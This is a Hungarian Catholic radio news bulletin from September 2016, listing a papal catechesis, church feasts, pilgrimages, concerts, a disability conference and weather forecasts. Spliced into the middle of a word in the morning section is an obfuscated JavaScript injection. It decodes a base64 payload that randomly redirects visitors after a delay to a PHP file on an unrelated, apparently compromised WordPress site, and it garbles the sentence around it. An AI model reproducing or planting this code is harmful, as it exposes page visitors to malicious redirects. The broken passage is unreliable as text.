2016. szeptember 14. – Hírek és programajánló

H Í R E K   E S T E

Jézus felüdít minket, bátran kövessük őt!
„Jöjjetek hozzám mindnyájan, akik elfáradtatok és meg vagytok terhelve: én felüdítlek titeket. Vegyétek magatokra igámat és tanuljatok tőlem, mert szelíd vagyok és alázatos szívű, s így nyugalmat talál lelketek. Az én igám édes, az én terhem könnyű”. Máté evangéliumának ezen szakaszára építette katekézisét Ferenc pápa, a ma délelőtti általános kihallgatás alkalmából, melyet rádiónk is élő adásban közvetített. A pápa ezúttal az említett evangéliumi szakasz három kifejezéséhez fűzte tanítását. Az első felszólítás, amit Jézustól kapnak mindazok, akik fáradtak és elnyomottak: „jöjjetek hozzám”. Vonatkozik ez a szegényekre és a kicsinyekre is, akik csak Istenben bízhatnak. Jézus hívásában végre válaszra lelnek: tanítványaivá lesznek és megkapják az ígéretet, hogy egész életükben felüdíti őket. A második felszólítás: „vegyétek magatokra igámat”. Jézus igáját magára véve valamennyi tanítvány szeretetközösségbe kerül vele és részesedik a kereszt misztériumában és az üdvösségben. A harmadik felszólítás pedig: „tanuljatok tőlem”. Jézus nem egy szigorú tanító, aki olyan terhek viselését követeli másoktól, amiket ő maga nem visel. Az Úr megtanít rá, hogy ne féljünk követni Őt, mert a belé helyezett reményben sosem csalatkozunk. Meg kell tanulnunk Tőle az irgalmasságot, és nekünk is az irgalom eszközeivé kell válnunk – mondotta a szentatya.

Még tart a szeptemberi felvételi a kolozsvári Római Katolikus Teológia Karon
Szeptember 15-ig, azaz holnapig lehet még jelentkezni a Római Katolikus Teológia Kar államilag támogatott helyeire. A bentlakás mellett magánösztöndíjban is részesülhetnek azok a diákok, akik egy második szakot is el szeretnének végezni. Részletesebb információkért látogassák meg a www.rocateo.ubbcluj.ro honlapot.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében holnap a gyergyószentmiklósi örmény templomban tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Fájdalmas Szűzanya búcsú Nagyváradon
A váradhegyfoki premontrei rend temploma a Fájdalmas Szűzanya tiszteletére lett felszentelve, melynek megünneplése három napon át tart. Holnap délután fél hattól a Fájdalmas Anya litániát imádkozzák, majd a búcsús szentmisét hat órától Holnapi Dénes Márton, gödöllői premontrei alperjel mutatja be. Pénteken és szombaton délután fél hat órától a hétfájdalmú rózsafüzér elimádkozása után hat órától kezdődik a szentmise. Meghívott szónokok: pénteken Schek László, érszalacsi plébános, szombaton pedig Pitó Lajos, monospetri plébános. Mindhárom nap fél hattól hat óráig gyónási lehetőség is lesz. Vasárnap, szeptember 18-án lesz a templom felszentelésének ünnepe. A szentmisét reggel fél tízkor Fejes Rudolf Anzelm premontrei apát mutatja be. Holnap és vasárnap is, a szokott feltételek mellett teljes búcsúban lehet részesülni. Várják a híveket az ünnepi alkalmakra.

Pánsíp koncert Nagyváradon
Szeptember 18-án, vasárnap este hét órától a híres Steve Taylor-Szabó pánsípművész tart koncertet a Várad-Szőllősi plébániatemplomban. Várják a zenekedvelőket és mindazokat, akik különösen szép zenei élményben akarnak részesülni.

Életadó házasság – kapcsolatépítő hétvége Kolozsváron
A Gyulafehérvári Főegyházmegye Családmunka-csoportja szeptember 23-24. között Kolozsváron Életadó házasság címmel kapcsolatépítő hétvégére hívja és várja a házaspárokat, a házasságra készülőket és azokat is, akik a házaspárok életét segíteni szeretnék. Bejelentkezni szeptember 20-ig lehet. Bővebb információ az iroda@csalad.ro címen vagy a 0742-139.380-as telefonszámon Bakó Máriánál kapható.

Lánytábor 2016
A gyergyószárhegyi ferences kolostorban szeptember 23-25. között lánytábort szerveznek, melyre minden olyan 15 és 35 év közötti lány, nő, hölgy jelentkezését várják, akik szeretnének egy hétvégét Isten jelenlétében és egymás szolgálatában eltölteni. A tábor célja a keresztény női identitás tudatosítása, a ferences lelkiség nőként való megélése, mindez az Irgalmasság témakörben. Mindemellett lesz kis kézimunka, házimunka, barangolás a természetben, kötetlen együttlét és örömteli percek. Jelentkezni szeptember 21-ig lehetséges. Bővebb információ a 0749-993.285-ös telefonszámon kapható.

Időjárás: Holnap sok napsütésre, csapadékmentes időre számíthatunk. Északnyugaton megélénkülhet a szél. A hajnali 5-15 fokot követően a délutáni órákban 25 és 30 fok közötti értékeket  mérhetünk.

MRE – Hírszolgálat, 2016. szeptember 14.


H Í R E K   R E G G E L

„Legyetek irgalmasak, mint az Atya” – Tematikus nap
Mások tanítása az irgalmasság tettének számít. Folytatjuk elmélkedéseinket az irgalmasság testi és lelki cselekedeteiről. A mai tematikus napunk vezérgondolata: a tudatlanokat tanítani. „Hogy az oktalanok tudatlanságát elnémítsuk, Isten szolgáiként állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andóan az Úr Jézus jelenlétében kell élnünk... alázatosságot, és embertársaink iránt el nem fogyó szeretetet kell gyakorolnunk. Mindezt pedig mély hittel és tisztelettel valósíthatjuk meg.” (Márton Áron breviáriuma) Ezekkel a gondolatokkal hívjuk kedves hallgatóinkat, hogy tartsanak velünk!

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a csíkszeredai Szent Kereszt főplébánia templomban tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Nyitott Templomok Napja Csíksomlyón
Szeptember 17-én, szombaton rendezik meg Csíksomlyón a Nyitott Templomok Napját. A program Szent Ferenc stigmatizációjának ünnepén este hét órakor szentmisével kezdődik, amelyet imaóra követ. Az imaóra után az érdeklődők dokumentumfilmet láthatnak Szent Ferenc alvernai stigmatizációjáról. A filmnézés után csendes imádkozásra is lesz alkalom – tudósított Borsodi L. László ferences sajtóreferens.

A Hargitára hívnak imádkozni a pálos testvérek
Szent Kereszt Felmagasztalásának ünnepét követő szombaton, azaz szeptember 17-én, délután két órakor, hagyományteremtés céljával, szentmise lesz Hargitafürdőn, az adótorony (relé) mellett elhelyezett keresztnél.  Gyülekezés déli tizenkét órakor a Hotel Ózon előtt, indulás 12 óra 15 perckor. Az út meredeken vezet fel a kereszthez, erre számítva és ehhez alkalmas öltözékben, cipőben érkezzenek! A szentmise keretében nemzetünk, családjaink egységéért, békéjéért imádkoznak! Mindenkit várnak a pálos testvérek!

Még tart a szeptemberi felvételi a kolozsvári Római Katolikus Teológia Karon
Szeptember 15-ig lehet jelentkezni a Római Katolikus Teológia Kar államilag támogatott helyeire. A bentlakás mellett magánösztöndíjban is részesülhetnek azok a diákok, akik egy második szakot is el szeretnének végezni. Részletesebb információkért látogassák meg a www.rocateo.ubbcluj.ro honlapot.

Sokarcú irgalmasság - könyvbemutató Petrozsényban
Szeptember 21-én, szerdán este fél hét órakor, Petrozsényban, a Caritas nagytermében Bereczki Silvia segítőnővér, szerkesztő és Szőcs Csaba, a Verbum kiadó igazgatója bemutatják a szentévre megjelent, Sokarcú irgalmasság - Vallomások, interjúk, tanulmányok című könyvet, a Keresztény Szó könyvek sorozat 5. kötetét.
Az est házigazdája: Szász János plébános.

X. Együtt a fogyatékkal élőkért konferencia
Újabb szakmai konferenciára várják az érdeklődőket szeptember 23-24-én, Csíkszeredába, a Taploca utca 20 szám alatt található Apáczai Csere János Pedagógusok Házába. A szervezőcsapat vár minden segítő szakmában dolgozó szakembert, pedagógust, szülőket és téma iránt érdeklődőket, hogy közösen találjanak válaszokat a speciális nevelési igényű gyerek kamaszkorában felmerülő oktatási, nevelési kérdésekre.
A konferencia témái: Értelmileg akadályozottak kamaszkora, szexualitása, magatartászavarok és kezelésük. Gátlásosság kamaszkorban. Hozzátartozók terhelése, kapcsolatunk a hozzátartozókkal. Érdeklődni a 0736-102688-as, 0751-140067-es telefonszámokon, vagy az emese.szasz@caritas-ab.ro email címen lehet.

Ő az út! - Ifjúsági keresztény zenefesztivál
Marosszentgyörgyön szeptember 24-én, szombaton délután öt és este kilenc óra között kerül sor az Ő az út! Ifjúsági keresztény zenefesztiválra. Az előadok között ott lesz a Stone Hill zenekar, Pora Zoli, aki gyerekdalokkal szólítja meg a kisebbeket, Sipos Tiffany, Nemes Tibor a Vecker énekese, a Reménység zenekar, és az UNLESS együttes. Az eseményről bővebben a facebook-on olvashatnak. A belépés díjtalan!

Székesegyházi búcsú és Márton Áron ünnepség Gyulafehérváron
Szeptember 29-én, Szent Mihály főangyal ünnepén, délelőtt tizenegy órától kezdődik Gyulafehérváron a búcsús szentmise, melynek főcelebránsa Miguel Maury Buendía érsek, romániai apostoli nuncius. Közvetlenül a szentmise után lesz annak a kőszarkofágnak a megáldása, amelybe Áron püspök földi maradványai kerültek áthelyezésre a székesegyház kriptájából.
Mindazok, akik nem tudnak elzarándokolni Gyulafehérvárra, a szentmisébe bekapcsolódhatnak a Duna Televízión keresztül, vagy a Seminarium Incarnatae Sapientiae YouTube csatornáján – tudtuk meg a gyulafehérvári érsekség honlapjáról.

Időjárás: Péntekig tart a nyárias idő. Ma a napos időt délen zavarják meg gomolyfelhők, melyekből elszórtan frissítő záporok, esetleg zivatarok is kialakulhatnak. Megélénkül az északi-északkeleti szél. Bár a hajnalok hüvősek napközben a legmagasabb hőmérséklet 24 és 30 fok köré melegszik.  

MRE - Hírszolgálat, 2016. szeptember 14.

About the author

maradmin

Leave a Comment